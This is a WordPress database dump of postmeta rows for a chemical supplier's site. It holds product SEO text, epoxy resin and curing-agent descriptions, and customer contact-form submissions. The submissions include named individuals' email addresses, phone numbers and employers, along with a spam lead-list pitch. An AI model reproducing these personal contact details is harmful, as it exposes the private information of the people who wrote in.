INSERT INTO `wp_postmeta` VALUES (24965, 2800, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24966, 2800, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24967, 2800, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (24968, 2800, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24969, 2800, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24970, 2800, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (24971, 2800, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24972, 2800, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24973, 2800, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (24974, 2800, '_ywtm_title_tab_description', ''); 
INSERT INTO `wp_postmeta` VALUES (24975, 2800, '_ywtm_content_tab_description', ''); 
INSERT INTO `wp_postmeta` VALUES (24976, 2800, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (24977, 2800, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24978, 2800, '_yoast_wpseo_primary_product_cat', '340'); 
INSERT INTO `wp_postmeta` VALUES (24979, 2800, '_yoast_wpseo_focuskw_text_input', 'ms-730l contact re-nu'); 
INSERT INTO `wp_postmeta` VALUES (24980, 2800, '_yoast_wpseo_focuskw', 'ms-730l contact re-nu'); 
INSERT INTO `wp_postmeta` VALUES (24981, 2800, '_yoast_wpseo_title', 'MS-730L Contact Re-Nu® - Miller-Stephenson Chemical'); 
INSERT INTO `wp_postmeta` VALUES (24982, 2800, '_yoast_wpseo_metadesc', 'Contact Re-Nu® is a low global warming formulation. It is an odorless cleaning agent that restores electrical and mechanical continuity.'); 
INSERT INTO `wp_postmeta` VALUES (24983, 2800, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (24984, 2800, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (24985, 1690, '_wp_old_slug', 'ms-755l'); 
INSERT INTO `wp_postmeta` VALUES (24986, 1690, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24987, 1690, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24988, 1690, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (24989, 1690, '_yoast_wpseo_focuskw_text_input', 'Flux Remover'); 
INSERT INTO `wp_postmeta` VALUES (24990, 1690, '_yoast_wpseo_focuskw', 'Flux Remover'); 
INSERT INTO `wp_postmeta` VALUES (24991, 1690, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (24992, 1690, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (24993, 2804, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (24994, 2804, '_seq_num', '73'); 
INSERT INTO `wp_postmeta` VALUES (24995, 2804, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24996, 2804, '_field_1', 'Sherry Evens'); 
INSERT INTO `wp_postmeta` VALUES (24997, 2804, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (24998, 2804, '_field_2', 'sherry.e@b2bbusinessleads.com'); 
INSERT INTO `wp_postmeta` VALUES (24999, 2804, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (25000, 2804, '_field_3', 'Hi,\r\n \r\nI hope you are the right person to discuss about the Aircraft &amp; Aerospace Industry Professionals Email List 2016 which includes complete contact details of all - C-suite- CTOs, CIOs, COOs, Owners, VPs of Strategy/R&amp;D/Business Development, Manager, Operations Professionals, IT Professionals, Facilities Professionals, government agencies, investors, and investment bankers, edia and universitiesand business leaders across USA.\r\n \r\nWe also have Industry Specific Lists:\r\n\r\nHealthcare Industry: -  Hospitals, Medical Clinics, Surgical centers, Physicians and Doctors, Hospital Administrators, Nurses, Spa, etc,\r\nInformation Technology:  Computer Hardware, Software, and IT Resellers (Value Added Resellers), etc,\r\nAutomotive Industry: -  Automobile dealers, New &amp; Used Car Dealers, Used Car Dealers, Gasoline Service Stations, Boat Dealers, etc,\r\nFinance &amp; Banking:-  Insurance Agents, Banks, Financial Services, Credit Agency Non-Bank, Mortgage Bankers &amp; Correspondents, etc,\r\nRetail Industry -  Department stores, Supermarkets, Specialty stores, Convenience stores, Grocery store, Restaurants etc,\r\nFood Industry:-  Food Preparations NEC (Manufacturers), Food Products (Wholesale), Retailers, Wholesalers, Buyers &amp; Importers,\r\nManufacturing Industry:  Food, Kindred Products, Textile, Apparel, Furniture, Fixtures, etc,\r\n \r\nPlease send me your target audience and geographical area, so that I can send counts, samples along with pricing.\r\n \r\nTarget Industry : ________________________________ (Any Industry - We have it all)\r\nTarget Geography : ______________________________ (USA, Canada, UK and Australia)\r\nTarget Job Title : ________________________________ (CEO, CFO, CTO, VP/Director).\r\n \r\nLooking forward to continued success with you.\r\n \r\nKind Regards,\r\nSherry Evens\r\nB2B Business Leads, Inc.\r\nsherry.e@b2bbusinessleads.com\r\n \r\nIf you do not wish to receive any further email, please reply as Remove in the subject line. '); 
INSERT INTO `wp_postmeta` VALUES (25001, 2804, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25002, 2804, '_sub_id', '2804'); 
INSERT INTO `wp_postmeta` VALUES (25003, 2805, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25004, 2805, '_seq_num', '74'); 
INSERT INTO `wp_postmeta` VALUES (25005, 2805, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25006, 2805, '_field_1', 'ROBSON OSHIRO'); 
INSERT INTO `wp_postmeta` VALUES (25007, 2805, '_field_10', 'Arbor Controls &amp; Testing'); 
INSERT INTO `wp_postmeta` VALUES (25008, 2805, '_field_2', 'ROBSONO@ARBORCONTROLS.COM'); 
INSERT INTO `wp_postmeta` VALUES (25009, 2805, '_field_8', '(801) 647-6201'); 
INSERT INTO `wp_postmeta` VALUES (25010, 2805, '_field_3', 'Hi,\r\n\r\nI would like to get a quote on \r\nMiller-Stephenson MS-582 Precision Cleaning Solvent\r\n\r\nPlease contact me on the e-mail or phone number listed.\r\n\r\nThanks,\r\nRobson'); 
INSERT INTO `wp_postmeta` VALUES (25011, 2805, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25012, 2805, '_sub_id', '2805'); 
INSERT INTO `wp_postmeta` VALUES (25013, 2806, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25014, 2806, '_seq_num', '75'); 
INSERT INTO `wp_postmeta` VALUES (25015, 2806, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25016, 2806, '_field_1', 'Emilio Concha'); 
INSERT INTO `wp_postmeta` VALUES (25017, 2806, '_field_10', 'Cal Poly Pomona Formula SAE'); 
INSERT INTO `wp_postmeta` VALUES (25018, 2806, '_field_2', 'emilioc@cpp.edu'); 
INSERT INTO `wp_postmeta` VALUES (25019, 2806, '_field_8', '(661) 621-4275'); 
INSERT INTO `wp_postmeta` VALUES (25020, 2806, '_field_3', 'Hello,\r\nMy name is Emilio Concha and I am the Carbon Wheels Captain for the Formula SAE (FSAE) team at Cal Poly Pomona (Bronco Motorsports). We are a student-run organization that designs and manufactures a formula-style race car for international competitions held by the Society of Automotive Engineers. We have used your Quik Freeze products before for composite layups and were very impressed by the results. I was wondering if your company had any sponsorship or donation programs for university projects. Our team would benefit greatly from any kind of help from Miller Stephenson that could push us towards our goals. If there is any information regarding sponsorship please feel free to contact me. \r\n\r\nBest Regards,\r\nEmilio  '); 
INSERT INTO `wp_postmeta` VALUES (25021, 2806, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25022, 2806, '_sub_id', '2806'); 
INSERT INTO `wp_postmeta` VALUES (25025, 2809, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25026, 2809, '_seq_num', '76'); 
INSERT INTO `wp_postmeta` VALUES (25027, 2809, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25028, 2809, '_field_1', 'Eric Baumann'); 
INSERT INTO `wp_postmeta` VALUES (25029, 2809, '_field_10', 'IngMar Medical Ltd.'); 
INSERT INTO `wp_postmeta` VALUES (25030, 2809, '_field_2', 'ebaumann@ingmarmed.com'); 
INSERT INTO `wp_postmeta` VALUES (25031, 2809, '_field_8', '(412) 441-8228'); 
INSERT INTO `wp_postmeta` VALUES (25032, 2809, '_field_3', 'Hello,\r\n\r\nMy name is Eric Baumann, and I am currently an engineering intern at IngMar Medical. I am emailing to inquire about obtaining a Certificate of Compliance for the Restriction of Hazardous Materials Directive for some of your products:\r\n\r\n- Krytox Small Dispenser (GPL 104 oil)\r\n\r\nWe are in the process of completing our due diligence so that we can declare compliance of our own, so we need to prove that all of the products we buy are also RoHS compliant. If you could send me compliance documents for the aforementioned products that would be great!\r\n\r\nThanks so much!\r\n\r\n-Eric\r\n'); 
INSERT INTO `wp_postmeta` VALUES (25033, 2809, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25034, 2809, '_sub_id', '2809'); 
INSERT INTO `wp_postmeta` VALUES (25035, 2810, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25036, 2810, '_seq_num', '89'); 
INSERT INTO `wp_postmeta` VALUES (25037, 2810, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25038, 2810, '_field_12', 'Michael King'); 
INSERT INTO `wp_postmeta` VALUES (25039, 2810, '_field_13', 'UFP Technologies'); 
INSERT INTO `wp_postmeta` VALUES (25040, 2810, '_field_18', '?'); 
INSERT INTO `wp_postmeta` VALUES (25041, 2810, '_field_14', 'mking@ufpt.com'); 
INSERT INTO `wp_postmeta` VALUES (25042, 2810, '_field_15', '(978) 234-0956'); 
INSERT INTO `wp_postmeta` VALUES (25043, 2810, '_field_16', 'I am interested in learning about some silicone release agents. I have an application where I want to apply the release to a Polypropylene Sheet (.011&quot;) and I want it to stay on there during thermoforming. The product after thermoforming is a tub to hold hot melt glues. The hot melt glue needs to come out of the tub.\n\nWe&#039;ve tried some silicone release applied as a in-line coating but it is breaking down during the forming process. It can&#039;t sustain the amount of stretch required to form the part, it cracks or separates. The coating we tried was a thermal cure silicone release. Looking to understand what other tools we may have to solve the problem. Anything I can put on wet/dry right before thermoforming that may &quot;flow&quot; when the substrate is stretched....  Need some general help to understand if there are some avenues I should be exploring.\n\nThanks,\n\nMike'); 
INSERT INTO `wp_postmeta` VALUES (25044, 2810, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25045, 2810, '_sub_id', '2810'); 
INSERT INTO `wp_postmeta` VALUES (25046, 2811, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25047, 2811, '_seq_num', '77'); 
INSERT INTO `wp_postmeta` VALUES (25048, 2811, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25049, 2811, '_field_1', 'Larry Alvarez'); 
INSERT INTO `wp_postmeta` VALUES (25050, 2811, '_field_10', 'EIS  Incorporated'); 
INSERT INTO `wp_postmeta` VALUES (25051, 2811, '_field_2', 'lalvarez@eis-inc.com'); 
INSERT INTO `wp_postmeta` VALUES (25052, 2811, '_field_8', '(915) 519-3512'); 
INSERT INTO `wp_postmeta` VALUES (25053, 2811, '_field_3', 'I need to get pricing on 20 each GPL205? Tube 2oz\nCan you include delivery on this item?'); 
INSERT INTO `wp_postmeta` VALUES (25054, 2811, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25055, 2811, '_sub_id', '2811'); 
INSERT INTO `wp_postmeta` VALUES (25056, 2812, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25057, 2812, '_seq_num', '78'); 
INSERT INTO `wp_postmeta` VALUES (25058, 2812, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25059, 2812, '_field_1', 'Vernon Grider'); 
INSERT INTO `wp_postmeta` VALUES (25060, 2812, '_field_10', 'Danzer Veneer Americas'); 
INSERT INTO `wp_postmeta` VALUES (25061, 2812, '_field_2', 'vernon.grider@danzer.com'); 
INSERT INTO `wp_postmeta` VALUES (25062, 2812, '_field_8', '(812) 526-7563'); 
INSERT INTO `wp_postmeta` VALUES (25063, 2812, '_field_3', 'Do you offer the Dupont Corrugator 226FG grease in 1 lb containers? If so I need a quote on either this or the regular grease tubes. Please call me with any questions.\nBest regards, Vernon Grider, Purchasing Manager\n'); 
INSERT INTO `wp_postmeta` VALUES (25064, 2812, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25065, 2812, '_sub_id', '2812'); 
INSERT INTO `wp_postmeta` VALUES (25066, 2813, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25067, 2813, '_seq_num', '90'); 
INSERT INTO `wp_postmeta` VALUES (25068, 2813, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25069, 2813, '_field_12', 'Jeffrey M. Headrick'); 
INSERT INTO `wp_postmeta` VALUES (25070, 2813, '_field_13', 'Random Technologies, LLC'); 
INSERT INTO `wp_postmeta` VALUES (25071, 2813, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25072, 2813, '_field_14', 'jeffh@randomtechnologies.com'); 
INSERT INTO `wp_postmeta` VALUES (25073, 2813, '_field_15', '(415) 255-1267'); 
INSERT INTO `wp_postmeta` VALUES (25074, 2813, '_field_16', 'I am updating my chemical inventory and I need a current revision SDS for:  Krytox GPL 206 Laboratory Lubricant.'); 
INSERT INTO `wp_postmeta` VALUES (25075, 2813, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25076, 2813, '_sub_id', '2813'); 
INSERT INTO `wp_postmeta` VALUES (25078, 2773, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (25079, 474, '_wp_old_slug', 'dental-lubricant'); 
INSERT INTO `wp_postmeta` VALUES (25081, 1896, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (25082, 887, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (25083, 887, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (25084, 887, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (25085, 887, '_yoast_wpseo_focuskw_text_input', 'EPON 862'); 
INSERT INTO `wp_postmeta` VALUES (25086, 887, '_yoast_wpseo_focuskw', 'EPON 862'); 
INSERT INTO `wp_postmeta` VALUES (25087, 887, '_yoast_wpseo_metadesc', 'EPON 862 (Diglycidyl Ether of Bisphenol F) is a low viscosity, liquid epoxy resin manufactured from epichlorohydrin and Bisphenol-F. HEXION EPON'); 
INSERT INTO `wp_postmeta` VALUES (25088, 887, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (25089, 887, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (25090, 887, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25091, 887, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25092, 887, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (25093, 887, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (25094, 887, '_ywtm_content_tab_description', '<p class="Section1">EPON Resin 862 (Diglycidyl Ether of Bisphenol F) is a low viscosity, liquid epoxy resin manufactured from epichlorohydrin and Bisphenol-F.  This resin contains no diluents or modifiers.  EPON Resin 862 may be used as the sole epoxy resin or combined with other resins such as EPON Resin 828. When blended with EPON 828, EPON 862 provides a technique to reduce viscosity with no sacrifice in chemical and solvent resistance properties, and the blended resin will exhibit improved crystallization resistance properties when compared to the neat, liquid, Bisphenol-A or Bisphenol-F type resins.  When EPON Resin 862 is cross-linked with appropriate curing agents, superior mechanical, adhesive, electrical and chemical resistance properties can be obtained.</p>\r\n<p class="Section1"><strong>Application Areas/Suggested Uses</strong></p>\r\n\r\n<div class="Section1">\r\n<ul>\r\n 	<li>Solventless or high solids/low VOC maintenance and marine coatings</li>\r\n 	<li>Chemical resistant tank linings, floorings, and grouts</li>\r\n 	<li>Fiber reinforced pipes, tanks, and composites</li>\r\n 	<li>Tooling, casting, and molding compounds</li>\r\n 	<li>Construction, electrical, and aerospace adhesives</li>\r\n</ul>\r\n</div>\r\n<strong>Benefits</strong>\r\n<ul>\r\n 	<li>Low viscosity</li>\r\n 	<li>Low color</li>\r\n 	<li>Reacts with a full range of epoxy curatives</li>\r\n 	<li>Good balance of mechanical, adhesive, and electrical properties</li>\r\n 	<li>Good chemical resistance</li>\r\n 	<li>Superior physical properties vs. diluted (6 Poise) resin</li>\r\n 	<li>Reduced diluent levels to achieve specific viscosity targets</li>\r\n 	<li>Higher solids or reduced solvent levels for coatings</li>\r\n 	<li>Improved handling and flow in colder application environments</li>\r\n 	<li>Improved fiber and filler wetting</li>\r\n</ul>\r\n<strong>Safety, Storage &amp; Handling</strong>\r\n\r\nPlease refer to the MSDS for the most current Safety and Handling information.\r\n\r\nPlease refer to the Hexion web site for Shelf Life and recommended Storage information.\r\n\r\nEPON 862 should be stored in tightly sealed containers of metal, glass, or polyolefin plastic at normal room temperatures.  If EPON Resin 862 develops haziness or crystallizes during storage, it can be restored to its original condition by gently warming the container and its contents to approximately 170-190°F until all visual evidence of crystallization is gone.  Upon cooling to normal ambient temperature conditions, the product will regain its original liquid state physical properties.  This process can be repeated as necessary.'); 
INSERT INTO `wp_postmeta` VALUES (25095, 887, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (25096, 1877, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (25097, 1868, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (25098, 1868, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (25099, 1868, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (25100, 1868, '_yoast_wpseo_focuskw_text_input', 'Epikure 3140'); 
INSERT INTO `wp_postmeta` VALUES (25101, 1868, '_yoast_wpseo_focuskw', 'Epikure 3140'); 
INSERT INTO `wp_postmeta` VALUES (25102, 1868, '_yoast_wpseo_metadesc', 'Hexion EPIKURE 3140 is a low viscosity reactive polyamide, high imidazoline, moderate molecular weight epoxy curing agent.'); 
INSERT INTO `wp_postmeta` VALUES (25103, 1868, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (25104, 1868, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (25105, 1868, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25106, 1868, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25107, 1868, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (25108, 1868, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (25109, 1868, '_ywtm_content_tab_description', 'EPIKURE 3140 Polyamides are one of the most popular types of amine curing agents. Benefits include superior corrosion and water resistance, flexibility and toughness, superior adhesion to metal, good impact resistance, noncritical mix ratios and long pot life. Certain modified polyamides can be used to develop higher solids formulations that offer superior performance.\r\n<p class="Section1"><strong>Application Areas/Suggested Uses: </strong>EPIKURE 3140 Curing agent is used in adhesive applications, as well as in primer, midcoat and topcoat formulations for ships, bridges, industrial equipment, hopper cars, tank trucks, automotive refinishes and industrial flooring. They are also used in putties, sealants and electrical encapsulation.</p>\r\n\r\n<ul>\r\n 	<li>\r\n<div class="Section1">Metal and plastic adhesives</div></li>\r\n 	<li>\r\n<div class="Section1">Highway and bridge deck repairs</div></li>\r\n 	<li>\r\n<div class="Section1">Potting, casting, and encapsulation</div></li>\r\n 	<li>\r\n<div class="Section1">Synthetic flooring systems</div></li>\r\n 	<li>\r\n<div class="Section1">Maintenance coatings</div></li>\r\n 	<li>\r\n<div class="Section1">Tank and pipe linings</div></li>\r\n</ul>\r\n<strong>Benefits</strong>\r\n<ul>\r\n 	<li>\r\n<div>Good chemical and corrosion resistance</div></li>\r\n 	<li>\r\n<div>Good water resistance</div></li>\r\n 	<li>\r\n<div>Good pigment and substrate wetting</div></li>\r\n 	<li>\r\n<div>Good adhesion</div></li>\r\n</ul>\r\n<strong>Specifications</strong>\r\n<table style="height: 228px;" border="1" width="641" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Amine value</td>\r\n<td valign="top" width="72">\r\n<p align="center">mg/g</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">360-390</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D2896</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Viscosity @ 40°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">cP</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">3,000-4,000</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D2196</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Color</td>\r\n<td valign="top" width="72">\r\n<p align="center">Gardner</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">9</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1544</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211"></td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132"></td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<strong>Typical Properties</strong>\r\n<table style="height: 380px;" border="1" width="646" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Flash point</td>\r\n<td valign="top" width="72">\r\n<p align="center">°C</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">&gt;110</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D3278</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Density @ 25 °C</td>\r\n<td valign="top" width="72">\r\n<p align="center">lbs/gal</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">8.1</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Viscosity @ 25 °C</td>\r\n<td valign="top" width="72">\r\n<p align="center">P</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">130</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Appearance</td>\r\n<td valign="top" width="72"></td>\r\n<td colspan="2" valign="top" width="307">Clear and free of foreign particles</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Equivalent weight</td>\r\n<td valign="top" width="72">\r\n<p align="center">approx</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">95</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Mix ratio</td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132"></td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">EEW 190 epoxy</td>\r\n<td valign="top" width="72">\r\n<p align="center">phr</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">50</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211"></td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132"></td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (25110, 1868, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (25111, 2818, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25112, 2818, '_seq_num', '79'); 
INSERT INTO `wp_postmeta` VALUES (25113, 2818, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25114, 2818, '_field_1', 'Kazuhiko Yoshida'); 
INSERT INTO `wp_postmeta` VALUES (25115, 2818, '_field_10', 'JAPN AIRLINES'); 
INSERT INTO `wp_postmeta` VALUES (25116, 2818, '_field_2', 'kazuhiko.yoshida@jal.com'); 
INSERT INTO `wp_postmeta` VALUES (25117, 2818, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (25118, 2818, '_field_3', 'Dear Sirs,\r\nI am Kazuhiko Yoshida of an Engineer at JAL .\r\nI would like to ask you about the Release Agent Lubricant MS-143E.\r\nI knew that  MS-143E is discontinued.\r\nPlease let me know whether our understanding is correct.\r\nBest regards, \r\nKazuhiko Yoshida'); 
INSERT INTO `wp_postmeta` VALUES (25119, 2818, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25120, 2818, '_sub_id', '2818'); 
INSERT INTO `wp_postmeta` VALUES (25121, 2819, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25122, 2819, '_seq_num', '91'); 
INSERT INTO `wp_postmeta` VALUES (25123, 2819, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25124, 2819, '_field_12', 'Silvia Lozano'); 
INSERT INTO `wp_postmeta` VALUES (25125, 2819, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (25126, 2819, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25127, 2819, '_field_14', 'sillogon82@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (25128, 2819, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (25129, 2819, '_field_16', 'Good morning,\r\nI would need the sds of the following materials (if it´s possible, in english and spanish, please):\r\n- Epicure 3140 curing agent\r\n- Epon TM resin 828\r\nThank you so much.\r\nSilvia'); 
INSERT INTO `wp_postmeta` VALUES (25130, 2819, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25131, 2819, '_sub_id', '2819'); 
INSERT INTO `wp_postmeta` VALUES (25132, 2820, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25133, 2820, '_seq_num', '80'); 
INSERT INTO `wp_postmeta` VALUES (25134, 2820, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25135, 2820, '_field_1', 'Madison German'); 
INSERT INTO `wp_postmeta` VALUES (25136, 2820, '_field_10', 'Bosch Rexroth'); 
INSERT INTO `wp_postmeta` VALUES (25137, 2820, '_field_2', 'fixed-term.madison.german@boschrexroth-us.com'); 
INSERT INTO `wp_postmeta` VALUES (25138, 2820, '_field_8', '(704) 714-8612'); 
INSERT INTO `wp_postmeta` VALUES (25139, 2820, '_field_3', 'QUOTE needed for:\r\n\r\nKrytox 240AD 14oz.\r\n1 qty.'); 
INSERT INTO `wp_postmeta` VALUES (25140, 2820, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25141, 2820, '_sub_id', '2820'); 
INSERT INTO `wp_postmeta` VALUES (25142, 2821, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25143, 2821, '_seq_num', '81'); 
INSERT INTO `wp_postmeta` VALUES (25144, 2821, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25145, 2821, '_field_1', 'Chris Brooks'); 
INSERT INTO `wp_postmeta` VALUES (25146, 2821, '_field_10', 'Knowles Cazenovia'); 
INSERT INTO `wp_postmeta` VALUES (25147, 2821, '_field_2', 'christopher.brooks@knowles.com'); 
INSERT INTO `wp_postmeta` VALUES (25148, 2821, '_field_8', '(315) 655-8710'); 
INSERT INTO `wp_postmeta` VALUES (25149, 2821, '_field_3', 'Hello, I need a price quote on MS-111 Stripping Agent. Needed ASAP.\nThank you!\n-Chris Brooks'); 
INSERT INTO `wp_postmeta` VALUES (25150, 2821, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25151, 2821, '_sub_id', '2821'); 
INSERT INTO `wp_postmeta` VALUES (25152, 2822, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25153, 2822, '_seq_num', '82'); 
INSERT INTO `wp_postmeta` VALUES (25154, 2822, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25155, 2822, '_field_1', 'Glenn Massey'); 
INSERT INTO `wp_postmeta` VALUES (25156, 2822, '_field_10', 'Jefferson International LTD'); 
INSERT INTO `wp_postmeta` VALUES (25157, 2822, '_field_2', 'gmassey.krugenttradingltd@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (25158, 2822, '_field_8', '(802) 743-6809'); 
INSERT INTO `wp_postmeta` VALUES (25159, 2822, '_field_3', 'Dear Sir / Madam \r\n        My name is Glenn Massey , And this order is an individual order. I like to make a purchase of Acrylic and i will be more happy if you can email me with the types and Prices that you have as well.... Please let me know if you do accept credit card as a form of payment, and that will be picking up at your location..Hope to read back from you soon.. \r\n\r\nWith kind regards \r\nGlenn Massey'); 
